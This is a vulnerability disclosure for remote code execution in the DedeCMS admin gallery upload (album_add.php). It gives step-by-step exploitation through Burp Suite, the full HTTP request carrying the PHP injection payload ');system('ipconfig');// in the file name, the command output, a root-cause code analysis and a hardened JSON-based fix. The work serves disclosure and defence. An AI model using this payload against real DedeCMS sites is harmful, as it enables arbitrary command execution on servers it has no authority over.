- Log in to the management page first, then select "内容维护" (Content Maintenance) in the upper right corner, click "图片集" (Image Gallery) on the left, and finally click "添加文档" (Add Document) in the middle, as shown in the screenshot below:
- After entering "添加文档", fill in the "图集标题" (Gallery Title), select a "图集主栏目" (Gallery Main Category), and in the manual upload section choose a local image to upload.
- Then open Burp Suite with Intercept turned on, intercept the HTTP request sent when the "确定" (OK) button is clicked, and change the value of the "name" parameter at the location marked in the screenshot to
`');system('ipconfig');//`
- Finally, forward the HTTP request; the response shows that the ipconfig command was executed successfully.
HTTP Request:
POST /dede/album_add.php HTTP/1.1
Host: 127.0.0.1
Content-Length: 4121
Cache-Control: max-age=0
sec-ch-ua:
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: ""
Upgrade-Insecure-Requests: 1
Origin: http://dedecms-57105.localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfoNBMhAWA73UNeUq
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.97 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: iframe
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: menuitems=1_1%2C2_1%2C3_1%2C4_1%2C5_1%2C6_1; DedeUserID=1; DedeUserID1BH21ANI1AGD297L1FF21LN02BGE1DNG=693db57bf5d85c42; PHPSESSID=0kckthapkrjb7jlhg207ovnit2; _csrf_name_8fc2d915=ee428983820312df1afe447e487e3dbd; _csrf_name_8fc2d9151BH21ANI1AGD297L1FF21LN02BGE1DNG=e2a21dd6e71d551c; DedeLoginTime=1694173153; DedeLoginTime1BH21ANI1AGD297L1FF21LN02BGE1DNG=1971781375dd7f27; ENV_GOBACK_URL=%2Fdede%2Fcontent_i_list.php%3Fchannelid%3D2
Connection: close
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="channelid"
2
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="cid"
0
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="imagebody"
粘贴到这里...
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="dopost"
save
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="maxwidth"
800
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="albumUploadFiles"
[{"name":"');system('ipconfig');//","remark":"something"}]
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="title"
rce
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="shorttitle"
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="redirecturl"
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="tags"
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="weight"
108
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="picname"
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="litpic"; filename=""
Content-Type: application/octet-stream
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="typeid"
13
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="typeid2"
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="dede_addonfields"
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="pagestyle"
2
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="row"
3
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="col"
4
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="ddmaxwidth"
200
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="pagepicnum"
12
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="isrm"
1
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="zipfile"
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="delzip"
1
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="copysource"
http://
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="body"
<p>123123</p>
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="source"
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="writer"
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="notpost"
0
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="click"
199
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="sortup"
0
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="color"
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="arcrank"
0
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="ishtml"
1
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="pubdate"
2023-09-08 19:55:03
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="money"
0
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="keywords"
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="description"
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="filename"
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="imageField.x"
44
------WebKitFormBoundaryfoNBMhAWA73UNeUq
Content-Disposition: form-data; name="imageField.y"
17
------WebKitFormBoundaryfoNBMhAWA73UNeUq--
HTTP Response:
HTTP/1.1 200 OK
Connection: close
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Fri, 08 Sep 2023 12:02:32 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02
X-Powered-By: PHP/5.6.9
Content-Length: 4344
Windows IP 配置
未知适配器 Appgate SDP:
连接特定的 DNS 后缀 . . . . . . . :
IPv4 地址 . . . . . . . . . . . . : 192.168.9.86
子网掩码 . . . . . . . . . . . . : 255.255.255.255
默认网关. . . . . . . . . . . . . :
以太网适配器 以太网 2:
媒体状态 . . . . . . . . . . . . : 媒体已断开连接
连接特定的 DNS 后缀 . . . . . . . :
以太网适配器 VirtualBox Host-Only Network:
连接特定的 DNS 后缀 . . . . . . . :
本地链接 IPv6 地址. . . . . . . . : fe80::3e32:8785:dc70:871f%22
IPv4 地址 . . . . . . . . . . . . : 192.168.56.1
子网掩码 . . . . . . . . . . . . : 255.255.255.0
默认网关. . . . . . . . . . . . . :
未知适配器 OpenVPN TAP-Windows6:
媒体状态 . . . . . . . . . . . . : 媒体已断开连接
连接特定的 DNS 后缀 . . . . . . . :
无线局域网适配器 本地连接* 1:
媒体状态 . . . . . . . . . . . . : 媒体已断开连接
连接特定的 DNS 后缀 . . . . . . . :
无线局域网适配器 本地连接* 10:
媒体状态 . . . . . . . . . . . . : 媒体已断开连接
连接特定的 DNS 后缀 . . . . . . . :
以太网适配器 VMware Network Adapter VMnet1:
连接特定的 DNS 后缀 . . . . . . . :
本地链接 IPv6 地址. . . . . . . . : fe80::49f3:576f:5115:6188%8
IPv4 地址 . . . . . . . . . . . . : 192.168.65.1
子网掩码 . . . . . . . . . . . . : 255.255.255.0
默认网关. . . . . . . . . . . . . :
以太网适配器 VMware Network Adapter VMnet8:
连接特定的 DNS 后缀 . . . . . . . :
本地链接 IPv6 地址. . . . . . . . : fe80::3812:ae41:6c56:c806%11
IPv4 地址 . . . . . . . . . . . . : 192.168.40.1
子网掩码 . . . . . . . . . . . . : 255.255.255.0
默认网关. . . . . . . . . . . . . :
以太网适配器 蓝牙网络连接:
媒体状态 . . . . . . . . . . . . : 媒体已断开连接
连接特定的 DNS 后缀 . . . . . . . :
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>成功发布一个图集!</title>
<link rel="stylesheet" type="text/css" href="/plus/img/base.css">
</head>
<body background='/plus/img/allbg.gif' leftmargin="8" topmargin='8'>
<table width="98%" border="0" align="center" cellpadding="0" cellspacing="0" bgcolor="#DFF9AA">
<tr>
<td height="28" style="border:1px solid #DADADA" background='/plus/img/wbg.gif'>
<b>◇文章管理::发布图集</b>
</td>
</tr>
<tr>
<td width="100%" height="80" style="padding-top:5px" bgcolor='#ffffff'>
<table width='100%' border='0' cellpadding='3' cellspacing='1' bgcolor='#DADADA'>
<tr bgcolor='#DADADA'>
<td colspan='2' background='/plus/img/wbg.gif' height='26'><font color='#666600'><b>成功发布一个图集:</b></font></td>
</tr>
<tr bgcolor='#FFFFFF'>
<td colspan='2' height='100'> <div style="line-height:36px;height:36px">
请选择你的后续操作:
<a href='album_add.php?cid=13'><u>继续发布图片</u></a>
<a href='archives_do.php?aid=121&dopost=editArchives'><u>更改图集</u></a>
<a href='/a/tuji/2023/0908/121.html' target='_blank'><u>预览文档</u></a>
<a href='catalog_do.php?cid=13&dopost=listArchives'><u>已发布图片管理</u></a>
<a href='/dede/content_i_list.php?channelid=2'>[<u>记忆的列表页</u>]</a>
</div><table width='80%' style='border:1px dashed #cdcdcd;margin-left:20px;margin-bottom:15px' id='tgtable' align='left'><tr><td bgcolor='#EBF5C9'> <strong>正在进行相关内容更新,请完成前不要进行其它操作:</strong>
</td></tr>
<tr><td>
<iframe name='stafrm' frameborder='0' id='stafrm' width='100%' height='200px' src='task_do.php?typeid=13&aid=121&dopost=makeprenext&nextdo='></iframe>
</td></tr>
</table> </td>
</tr>
<tr><td bgcolor='#F5F5F5'> </td></tr></table>
</td>
</tr>
</table>
<p align="center">
<br>
<br>
</p>
</body>
</html>
The vulnerable code appears in dede/album_add.php, and the key code snippets are as follows.
```php
<?php
...
if ($albumUploadFiles !== '') {
    // $albumUploadFiles is the JSON array posted by the form; each entry's
    // "name" is taken from the request without any validation
    $files = json_decode(stripslashes($albumUploadFiles), true);
    foreach ($files as $file) {
        $uploadTmp = DEDEDATA . '/uploadtmp';
        $tmpFile = $uploadTmp . '/' . $file['name'];
        $fileDir = $cfg_image_dir . '/' . MyDate($cfg_addon_savetype, time());
        CreateDir($fileDir);
        $filePath = $fileDir . '/' . $file['name'];
        ...
        $fid = $dsql->GetLastID();
        // the unvalidated name reaches AddMyAddon as $filename
        AddMyAddon($fid, $filePath);
        ...
```
Following the call into the AddMyAddon function:
```php
<?php
...
function AddMyAddon($fid, $filename)
{
    $cacheFile = DEDEDATA.'/cache/addon-'.session_id().'.inc';
    if(!file_exists($cacheFile))
    {
        $fp = fopen($cacheFile, 'w');
        fwrite($fp, '<'.'?php'."\r\n");
        fwrite($fp, "\$myaddons = array();\r\n");
        fwrite($fp, "\$maNum = 0;\r\n");
        fclose($fp);
    }
    // the per-session cache file is executed as PHP on every call
    include($cacheFile);
    $fp = fopen($cacheFile, 'a');
    $arrPos = $maNum;
    $maNum++;
    // $filename is interpolated unescaped into a single-quoted PHP literal,
    // so a name containing a quote can terminate the literal and append code
    fwrite($fp, "\$myaddons[\$maNum] = array('$fid', '$filename');\r\n");
    fwrite($fp, "\$maNum = $maNum;\r\n");
    fclose($fp);
}
...
```
When the albumUploadFiles parameter is processed, each entry's file name is passed into the AddMyAddon function as $filename. The carefully constructed malicious code in the file name is written unescaped into the cacheFile and then executed when that file is loaded by include(). The result is an arbitrary remote code execution vulnerability.
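As an added defensive illustration (this is not DedeCMS code), the following PHP 7+ rewrite removes the root cause shown above: the per-session addon list is stored as JSON and read back with json_decode, so no attacker-influenced string is ever written into a file that PHP executes, and upload names are checked against an allow-list before they are used as path components. DEDEDATA is reused from the original; the function and path names (AddMyAddonSafe, isSafeUploadName, addonCachePath, loadMyAddons and the .json suffix) are assumptions made for this example.

```php
<?php
// Added example, not DedeCMS code: a hardened replacement for AddMyAddon that
// stores the addon list as data (JSON) instead of generating PHP source.
// Helper names, the .json suffix and the demo path are assumptions.
declare(strict_types=1);

// Assumed: DEDEDATA is the writable data directory, as in the original code.
if (!defined('DEDEDATA')) {
    define('DEDEDATA', sys_get_temp_dir() . '/dededata_example');
}

/**
 * Accept only plain image file names: no directory components, no quotes,
 * no shell or PHP metacharacters, one known extension.
 */
function isSafeUploadName(string $name): bool
{
    // basename() strips any directory part; if it changed the value,
    // the name carried a path traversal attempt.
    if ($name === '' || basename($name) !== $name) {
        return false;
    }
    return preg_match('/\A[A-Za-z0-9_-]{1,100}\.(jpe?g|png|gif)\z/i', $name) === 1;
}

function addonCachePath(): string
{
    // Same per-session naming scheme as the original, but a data extension:
    // the web server never interprets this file as PHP.
    $sid = preg_replace('/[^A-Za-z0-9,-]/', '', session_id() ?: 'cli');
    return DEDEDATA . '/cache/addon-' . $sid . '.json';
}

/**
 * Hardened AddMyAddon: appends (fid, file) to the per-session list
 * without ever writing PHP code.
 */
function AddMyAddonSafe(int $fid, string $filename): void
{
    if (!isSafeUploadName($filename)) {
        throw new InvalidArgumentException('Rejected unsafe upload name');
    }
    $cacheFile = addonCachePath();
    if (!is_dir(dirname($cacheFile))) {
        mkdir(dirname($cacheFile), 0700, true);
    }
    $list = loadMyAddons();
    $list[] = ['fid' => $fid, 'file' => $filename];
    $json = json_encode($list);
    if ($json === false) {
        throw new RuntimeException('Could not encode addon list');
    }
    // LOCK_EX prevents interleaved writes from concurrent uploads.
    file_put_contents($cacheFile, $json, LOCK_EX);
}

/** Reads the list back; this replaces the include() of generated code. */
function loadMyAddons(): array
{
    $cacheFile = addonCachePath();
    if (!is_file($cacheFile)) {
        return [];
    }
    $list = json_decode((string) file_get_contents($cacheFile), true);
    return is_array($list) ? $list : [];
}

// Demo with constructed input: start from an empty list, store a normal name,
// and show that the payload from the request above is rejected before it
// can reach the file system or the cache.
@unlink(addonCachePath());
AddMyAddonSafe(121, 'photo_01.jpg');
try {
    AddMyAddonSafe(122, "');system('ipconfig');//");
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), PHP_EOL;
}
var_dump(loadMyAddons());
```

The two changes are independent. If the generated-PHP cache format has to be kept for compatibility, writing each value with var_export($filename, true) instead of interpolating it produces a correctly quoted literal and closes the injection; the name allow-list still belongs in album_add.php before $tmpFile and $filePath are built, because the same unvalidated value is used there as a path component.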